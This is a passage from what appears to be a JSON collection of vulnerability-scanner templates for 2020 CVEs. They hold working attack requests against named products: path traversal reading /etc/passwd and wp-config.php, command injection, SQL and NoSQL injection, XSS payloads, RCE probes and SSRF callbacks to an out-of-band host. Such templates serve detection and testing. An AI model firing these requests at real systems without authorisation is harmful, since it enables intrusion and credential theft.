Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"word","part":"body","words":["window.location.href.indexOf"],"negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8615","info":{"name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12259","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /configDevice.php?rid=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/canto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Canto","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code 